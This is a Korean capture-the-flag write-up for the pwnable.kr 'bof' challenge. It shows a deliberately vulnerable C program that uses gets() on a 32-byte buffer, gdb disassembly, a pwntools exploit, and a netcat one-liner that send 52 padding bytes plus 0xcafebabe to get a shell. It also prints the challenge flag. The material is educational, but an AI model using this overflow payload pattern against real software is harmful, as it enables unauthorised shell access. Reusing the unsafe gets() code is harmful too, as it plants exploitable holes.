[Pwnable.kr] bof

[문제]

---

[풀이]

보호기법 분석

• 32bits 바이너리
• 카나리 존재
• NX bits 존재
• PIE 존재

 

소스코드 분석 - bof.c

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\\n");
	}
}

int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

• func 함수의 인자로 0xdeadbeef를 넣음
• gets함수로 overflowme에 입력 값을 받아 저장함
  • overflowme는 32byte로 할당됨
• key 값이 0xcafebabe라면 shell 획득할 수 있음

 

바이너리 실행

 

gdb 분석 - main

pwndbg> disass main
Dump of assembler code for function main:
   0x0000068a <+0>:	push   ebp
   0x0000068b <+1>:	mov    ebp,esp
   0x0000068d <+3>:	and    esp,0xfffffff0
   0x00000690 <+6>:	sub    esp,0x10
   0x00000693 <+9>:	mov    DWORD PTR [esp],0xdeadbeef
   0x0000069a <+16>:	call   0x62c <func>
   0x0000069f <+21>:	mov    eax,0x0
   0x000006a4 <+26>:	leave  
   0x000006a5 <+27>:	ret    
End of assembler dump.

• 0xdeadbeef는 0xffffd1b0에 저장됨

 

gdb 분석 - func

pwndbg> disass func
Dump of assembler code for function func:
   0x5655562c <+0>:	push   ebp
   0x5655562d <+1>:	mov    ebp,esp
   0x5655562f <+3>:	sub    esp,0x48
   0x56555632 <+6>:	mov    eax,gs:0x14
   0x56555638 <+12>:	mov    DWORD PTR [ebp-0xc],eax
   0x5655563b <+15>:	xor    eax,eax
   0x5655563d <+17>:	mov    DWORD PTR [esp],0x5655578c
   0x56555644 <+24>:	call   0xf7e35c40 <__GI__IO_puts>
   0x56555649 <+29>:	lea    eax,[ebp-0x2c]
   0x5655564c <+32>:	mov    DWORD PTR [esp],eax
   0x5655564f <+35>:	call   0xf7e35120 <_IO_gets>
=> 0x56555654 <+40>:	cmp    DWORD PTR [ebp+0x8],0xcafebabe
   0x5655565b <+47>:	jne    0x5655566b <func+63>
   0x5655565d <+49>:	mov    DWORD PTR [esp],0x5655579b
   0x56555664 <+56>:	call   0xf7e09780 <__libc_system>
   0x56555669 <+61>:	jmp    0x56555677 <func+75>
   0x5655566b <+63>:	mov    DWORD PTR [esp],0x565557a3
   0x56555672 <+70>:	call   0xf7e35c40 <__GI__IO_puts>
   0x56555677 <+75>:	mov    eax,DWORD PTR [ebp-0xc]
   0x5655567a <+78>:	xor    eax,DWORD PTR gs:0x14
   0x56555681 <+85>:	je     0x56555688 <func+92>
   0x56555683 <+87>:	call   0xf7edc530 <__stack_chk_fail>
   0x56555688 <+92>:	leave  
   0x56555689 <+93>:	ret    
End of assembler dump.

• overflowme에 임의의 입력 값(다수의 a)를 입력
• 입력 값은 0xffffd17c(esp)에 저장됨

• ebp+0x8에서 0xdeadbeef 값을 확인할 수 있음
• 해당 값과 0xcafebabe를 비교하여 값이 같다면 shell을 출력, 그렇지 않으면 바이너리가 종료됨

 

문제 해결

💡  bof 취약점을 이용하여 0xdeadbeef의 값을 0xcafebabe로 변조 [dummy(52)] + [0xcafebabe]

 

Exploit - Pwntools

from pwn import *

p = remote("pwnable.kr", 9000)

payload = "a"*52 + p32(0xcafebabe)

p.sendline(payload)
p.interactive()

💡 (python -c 'print "a"*52+"\xbe\xba\xfe\xca"';cat) | nc pwnable.kr 9000

---

flag

🍒 daddy, I just pwned a buFFer :)